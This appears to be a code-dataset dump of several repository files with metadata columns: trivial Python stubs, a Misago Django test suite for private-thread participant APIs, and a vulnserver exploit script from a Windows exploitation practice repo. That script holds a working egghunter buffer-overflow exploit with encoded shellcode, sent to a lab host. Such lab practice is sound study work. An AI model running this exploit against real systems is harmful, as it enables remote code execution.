hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | 
qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | 
qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8ccd17b125bc0aaac11ea2968d5539348fadf74f | 28 | py | Python | pytools/__init__.py | tobyqin/pytools | b60acbd554865c4c593b16f8f81b0b800b482701 | [
"MIT"
] | null | null | null | pytools/__init__.py | tobyqin/pytools | b60acbd554865c4c593b16f8f81b0b800b482701 | [
"MIT"
] | null | null | null | pytools/__init__.py | tobyqin/pytools | b60acbd554865c4c593b16f8f81b0b800b482701 | [
"MIT"
] | null | null | null | def get_hostname():
pass | 14 | 19 | 0.678571 | 4 | 28 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.214286 | 28 | 2 | 20 | 14 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
8cd62aff387d24011204f56c344cede45968390c | 35 | py | Python | carbone_sdk/__init__.py | Ideolys/carbone-sdk-python | 7dff1e56912694a5989a5f114e707d8653d2c85a | [
"Apache-2.0"
] | 2 | 2020-07-28T08:57:11.000Z | 2021-03-25T11:53:37.000Z | carbone_sdk/__init__.py | Ideolys/carbone-sdk-python | 7dff1e56912694a5989a5f114e707d8653d2c85a | [
"Apache-2.0"
] | 3 | 2020-09-12T14:35:26.000Z | 2021-04-12T15:03:21.000Z | carbone_sdk/__init__.py | carboneio/carbone-sdk-python | 7dff1e56912694a5989a5f114e707d8653d2c85a | [
"Apache-2.0"
] | 1 | 2020-12-04T12:45:38.000Z | 2020-12-04T12:45:38.000Z | from .carbone_sdk import CarboneSDK | 35 | 35 | 0.885714 | 5 | 35 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.085714 | 35 | 1 | 35 | 35 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
8cdcb65eb23bd46d85fa8b377627c6185859e420 | 13 | py | Python | src/test/data/pa3/AdditionalTestCase/UnitTest/Comparison_GE_True_GT.py | Leo-Enrique-Wu/chocopy_compiler_code_generation | 4606be0531b3de77411572aae98f73169f46b3b9 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa3/AdditionalTestCase/UnitTest/Comparison_GE_True_GT.py | Leo-Enrique-Wu/chocopy_compiler_code_generation | 4606be0531b3de77411572aae98f73169f46b3b9 | [
"BSD-2-Clause"
] | null | null | null | src/test/data/pa3/AdditionalTestCase/UnitTest/Comparison_GE_True_GT.py | Leo-Enrique-Wu/chocopy_compiler_code_generation | 4606be0531b3de77411572aae98f73169f46b3b9 | [
"BSD-2-Clause"
] | null | null | null | print(2 >= 1) | 13 | 13 | 0.538462 | 3 | 13 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 0.153846 | 13 | 1 | 13 | 13 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
506c0f243fd9ffbe2a2ec44535d0742f23988850 | 2,411 | py | Python | 3-egghunters/vulnserver-gter/exploit.py | anvbis/windows-exp | 309eba877737a21c88cd2e4aa3bed7741560b53c | [
"MIT"
] | null | null | null | 3-egghunters/vulnserver-gter/exploit.py | anvbis/windows-exp | 309eba877737a21c88cd2e4aa3bed7741560b53c | [
"MIT"
] | null | null | null | 3-egghunters/vulnserver-gter/exploit.py | anvbis/windows-exp | 309eba877737a21c88cd2e4aa3bed7741560b53c | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
from pwn import *
pad = b'\x41' * 147
# 0x625011af: jmp esp ;
ret = p32(0x625011af)
egghunter = asm('''
loop_inc_page:
or dx, 0x0fff
loop_inc_one:
inc edx
push edx
push 0x2
pop eax
int 0x2e
cmp al, 0x5
pop edx
je loop_inc_page
mov eax, 0x74303077
mov edi, edx
scasd
jnz loop_inc_one
scasd
jnz loop_inc_one
jmp edi
''')
buf = b"w00tw00t"
buf += b"\xb8\x1c\x39\x42\xec\xd9\xec\xd9\x74\x24\xf4\x5a\x31"
buf += b"\xc9\xb1\x52\x31\x42\x12\x83\xea\xfc\x03\x5e\x37\xa0"
buf += b"\x19\xa2\xaf\xa6\xe2\x5a\x30\xc7\x6b\xbf\x01\xc7\x08"
buf += b"\xb4\x32\xf7\x5b\x98\xbe\x7c\x09\x08\x34\xf0\x86\x3f"
buf += b"\xfd\xbf\xf0\x0e\xfe\xec\xc1\x11\x7c\xef\x15\xf1\xbd"
buf += b"\x20\x68\xf0\xfa\x5d\x81\xa0\x53\x29\x34\x54\xd7\x67"
buf += b"\x85\xdf\xab\x66\x8d\x3c\x7b\x88\xbc\x93\xf7\xd3\x1e"
buf += b"\x12\xdb\x6f\x17\x0c\x38\x55\xe1\xa7\x8a\x21\xf0\x61"
buf += b"\xc3\xca\x5f\x4c\xeb\x38\xa1\x89\xcc\xa2\xd4\xe3\x2e"
buf += b"\x5e\xef\x30\x4c\x84\x7a\xa2\xf6\x4f\xdc\x0e\x06\x83"
buf += b"\xbb\xc5\x04\x68\xcf\x81\x08\x6f\x1c\xba\x35\xe4\xa3"
buf += b"\x6c\xbc\xbe\x87\xa8\xe4\x65\xa9\xe9\x40\xcb\xd6\xe9"
buf += b"\x2a\xb4\x72\x62\xc6\xa1\x0e\x29\x8f\x06\x23\xd1\x4f"
buf += b"\x01\x34\xa2\x7d\x8e\xee\x2c\xce\x47\x29\xab\x31\x72"
buf += b"\x8d\x23\xcc\x7d\xee\x6a\x0b\x29\xbe\x04\xba\x52\x55"
buf += b"\xd4\x43\x87\xfa\x84\xeb\x78\xbb\x74\x4c\x29\x53\x9e"
buf += b"\x43\x16\x43\xa1\x89\x3f\xee\x58\x5a\x80\x47\x18\x7d"
buf += b"\x68\x9a\xdc\x90\x35\x13\x3a\xf8\xd5\x75\x95\x95\x4c"
buf += b"\xdc\x6d\x07\x90\xca\x08\x07\x1a\xf9\xed\xc6\xeb\x74"
buf += b"\xfd\xbf\x1b\xc3\x5f\x69\x23\xf9\xf7\xf5\xb6\x66\x07"
buf += b"\x73\xab\x30\x50\xd4\x1d\x49\x34\xc8\x04\xe3\x2a\x11"
buf += b"\xd0\xcc\xee\xce\x21\xd2\xef\x83\x1e\xf0\xff\x5d\x9e"
buf += b"\xbc\xab\x31\xc9\x6a\x05\xf4\xa3\xdc\xff\xae\x18\xb7"
buf += b"\x97\x37\x53\x08\xe1\x37\xbe\xfe\x0d\x89\x17\x47\x32"
buf += b"\x26\xf0\x4f\x4b\x5a\x60\xaf\x86\xde\x90\xfa\x8a\x77"
buf += b"\x39\xa3\x5f\xca\x24\x54\x8a\x09\x51\xd7\x3e\xf2\xa6"
buf += b"\xc7\x4b\xf7\xe3\x4f\xa0\x85\x7c\x3a\xc6\x3a\x7c\x6f"
pad = b'\x90' * 32 + egghunter + b'\x41' * (147-32-len(egghunter))
payload = b'GTER /.:/%s' % (pad + ret + b'\xE9\x68\xFF\xFF\xFF')
with remote('192.168.122.44', 9999) as r:
r.writeline(b'TRUN %s' % buf)
with remote('192.168.122.44', 9999) as r:
r.writeline(payload)
| 34.442857 | 66 | 0.659477 | 523 | 2,411 | 3.021033 | 0.458891 | 0.070886 | 0.018987 | 0.018987 | 0.070886 | 0.048101 | 0.048101 | 0.048101 | 0.048101 | 0.048101 | 0 | 0.236854 | 0.108669 | 2,411 | 69 | 67 | 34.942029 | 0.498371 | 0.017835 | 0 | 0.105263 | 0 | 0.473684 | 0.7463 | 0.593658 | 0 | 1 | 0.015222 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.017544 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5075a3d7314060327161c84be8ff62a62aba4c36 | 28,302 | py | Python | misago/threads/tests/test_privatethread_patch_api.py | HenryChenV/iJiangNan | 68f156d264014939f0302222e16e3125119dd3e3 | [
"MIT"
] | 1 | 2017-07-25T03:04:36.000Z | 2017-07-25T03:04:36.000Z | misago/threads/tests/test_privatethread_patch_api.py | HenryChenV/iJiangNan | 68f156d264014939f0302222e16e3125119dd3e3 | [
"MIT"
] | null | null | null | misago/threads/tests/test_privatethread_patch_api.py | HenryChenV/iJiangNan | 68f156d264014939f0302222e16e3125119dd3e3 | [
"MIT"
] | null | null | null | import json
from django.contrib.auth import get_user_model
from django.core import mail
from misago.acl.testutils import override_acl
from misago.threads import testutils
from misago.threads.models import Thread, ThreadParticipant
from .test_privatethreads import PrivateThreadsTestCase
UserModel = get_user_model()
class PrivateThreadPatchApiTestCase(PrivateThreadsTestCase):
def setUp(self):
super(PrivateThreadPatchApiTestCase, self).setUp()
self.thread = testutils.post_thread(self.category, poster=self.user)
self.api_link = self.thread.get_api_url()
self.other_user = UserModel.objects.create_user(
'BobBoberson', 'bob@boberson.com', 'pass123'
)
def patch(self, api_link, ops):
return self.client.patch(api_link, json.dumps(ops), content_type="application/json")
class PrivateThreadAddParticipantApiTests(PrivateThreadPatchApiTestCase):
def test_add_participant_not_owner(self):
"""non-owner can't add participant"""
ThreadParticipant.objects.add_participants(self.thread, [self.user])
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.user.username,
},
]
)
self.assertContains(
response, "be thread owner to add new participants to it", status_code=400
)
def test_add_empty_username(self):
"""path validates username"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': '',
},
]
)
self.assertContains(
response, "You have to enter new participant's username.", status_code=400
)
def test_add_nonexistant_user(self):
"""can't user two times"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': 'InvalidUser',
},
]
)
self.assertContains(response, "No user with such name exists.", status_code=400)
def test_add_already_participant(self):
"""can't add user that is already participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.user.username,
},
]
)
self.assertContains(response, "This user is already thread participant", status_code=400)
def test_add_blocking_user(self):
"""can't add user that is already participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.other_user.blocks.add(self.user)
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(response, "BobBoberson is blocking you.", status_code=400)
def test_add_no_perm_user(self):
"""can't add user that has no permission to use private threads"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
override_acl(self.other_user, {'can_use_private_threads': 0})
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(response, "BobBoberson can't participate", status_code=400)
def test_add_too_many_users(self):
"""can't add user that is already participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
for i in range(self.user.acl_cache['max_private_thread_participants']):
user = UserModel.objects.create_user(
'User{}'.format(i), 'user{}@example.com'.format(i), 'Pass.123'
)
ThreadParticipant.objects.add_participants(self.thread, [user])
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(
response, "You can't add any more new users to this thread.", status_code=400
)
def test_add_user_closed_thread(self):
"""adding user to closed thread fails for non-moderator"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
self.assertContains(
response, "Only moderators can add participants to closed threads.", status_code=400
)
def test_add_user(self):
"""adding user to thread add user to thread as participant, sets event and emails him"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
# event was set on thread
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'added_participant')
# notification about new private thread was sent to other user
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[-1]
self.assertIn(self.user.username, email.subject)
self.assertIn(self.thread.title, email.subject)
def test_add_user_to_other_user_thread_moderator(self):
"""moderators can add users to other users threads"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
self.thread.has_reported_posts = True
self.thread.save()
override_acl(self.user, {'can_moderate_private_threads': 1})
self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.user.username,
},
]
)
# event was set on thread
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'entered_thread')
# notification about new private thread wasn't sent because we invited ourselves
self.assertEqual(len(mail.outbox), 0)
def test_add_user_to_closed_moderator(self):
"""moderators can add users to closed threads"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
self.thread.is_closed = True
self.thread.save()
override_acl(self.user, {'can_moderate_private_threads': 1})
self.patch(
self.api_link, [
{
'op': 'add',
'path': 'participants',
'value': self.other_user.username,
},
]
)
# event was set on thread
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'added_participant')
# notification about new private thread was sent to other user
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[-1]
self.assertIn(self.user.username, email.subject)
self.assertIn(self.thread.title, email.subject)
class PrivateThreadRemoveParticipantApiTests(PrivateThreadPatchApiTestCase):
def test_remove_empty(self):
"""api handles empty user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': '',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_remove_invalid(self):
"""api validates user id type"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': 'string',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_remove_nonexistant(self):
"""removed user has to be participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_remove_not_owner(self):
"""api validates if user trying to remove other user is an owner"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertContains(
response, "be thread owner to remove participants from it", status_code=400
)
def test_owner_remove_user_closed_thread(self):
"""api disallows owner to remove other user from closed thread"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertContains(
response, "moderators can remove participants from closed threads", status_code=400
)
def test_user_leave_thread(self):
"""api allows user to remove himself from thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
self.user.subscription_set.create(
category=self.category,
thread=self.thread,
)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'participant_left')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.user.pk).count(), 0)
# thread was removed from user subscriptions
self.assertEqual(self.user.subscription_set.count(), 0)
def test_user_leave_closed_thread(self):
"""api allows user to remove himself from closed thread"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'participant_left')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.user.pk).count(), 0)
def test_moderator_remove_user(self):
"""api allows moderator to remove other user"""
removed_user = UserModel.objects.create_user('Vigilante', 'test@test.com', 'pass123')
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user, removed_user])
override_acl(self.user, {'can_moderate_private_threads': True})
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': removed_user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'participant_removed')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=removed_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 2)
self.assertEqual(self.thread.participants.filter(pk=removed_user.pk).count(), 0)
def test_owner_remove_user(self):
"""api allows owner to remove other user"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.other_user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists
self.assertTrue(Thread.objects.get(pk=self.thread.pk))
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'participant_removed')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.other_user.pk).count(), 0)
def test_owner_leave_thread(self):
"""api allows owner to remove hisemf from thread, causing thread to close"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertFalse(response.json()['deleted'])
# thread still exists and is closed
self.assertTrue(Thread.objects.get(pk=self.thread.pk).is_closed)
# leave event has valid type
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'owner_left')
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# user was removed from participation
self.assertEqual(self.thread.participants.count(), 1)
self.assertEqual(self.thread.participants.filter(pk=self.user.pk).count(), 0)
def test_last_user_leave_thread(self):
"""api allows last user leave thread, causing thread to delete"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'remove',
'path': 'participants',
'value': self.user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
self.assertTrue(response.json()['deleted'])
# thread is gone
with self.assertRaises(Thread.DoesNotExist):
Thread.objects.get(pk=self.thread.pk)
# valid users were flagged for sync
self.assertTrue(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
class PrivateThreadTakeOverApiTests(PrivateThreadPatchApiTestCase):
def test_empty_user_id(self):
"""api handles empty user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': '',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_invalid_user_id(self):
"""api handles invalid user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': 'dsadsa',
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_nonexistant_user_id(self):
"""api handles nonexistant user id"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.other_user.pk,
},
]
)
self.assertContains(response, "Participant doesn't exist.", status_code=400)
def test_no_permission(self):
"""non-moderator/owner can't change owner"""
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user])
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertContains(
response, "thread owner and moderators can change threads owners", status_code=400
)
def test_no_change(self):
"""api validates that new owner id is same as current owner"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.user.pk,
},
]
)
self.assertContains(response, "This user already is thread owner.", status_code=400)
def test_change_closed_thread_owner(self):
"""non-moderator can't change owner in closed thread"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
self.thread.is_closed = True
self.thread.save()
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.other_user.pk,
},
]
)
self.assertContains(
response, "Only moderators can change closed threads owners.", status_code=400
)
def test_owner_change_thread_owner(self):
"""owner can pass thread ownership to other participant"""
ThreadParticipant.objects.set_owner(self.thread, self.user)
ThreadParticipant.objects.add_participants(self.thread, [self.other_user])
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': self.other_user.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
self.assertFalse(UserModel.objects.get(pk=self.user.pk).sync_unread_private_threads)
self.assertTrue(UserModel.objects.get(pk=self.other_user.pk).sync_unread_private_threads)
# ownership was transferred
self.assertEqual(self.thread.participants.count(), 2)
self.assertTrue(ThreadParticipant.objects.get(user=self.other_user).is_owner)
self.assertFalse(ThreadParticipant.objects.get(user=self.user).is_owner)
# change was recorded in event
event = self.thread.post_set.order_by('id').last()
self.assertTrue(event.is_event)
self.assertEqual(event.event_type, 'changed_owner')
def test_moderator_change_owner(self):
"""moderator can change thread owner to other user"""
new_owner = UserModel.objects.create_user('NewOwner', 'new@owner.com', 'pass123')
ThreadParticipant.objects.set_owner(self.thread, self.other_user)
ThreadParticipant.objects.add_participants(self.thread, [self.user, new_owner])
override_acl(self.user, {'can_moderate_private_threads': 1})
response = self.patch(
self.api_link, [
{
'op': 'replace',
'path': 'owner',
'value': new_owner.pk,
},
]
)
self.assertEqual(response.status_code, 200)
# valid users were flagged for sync
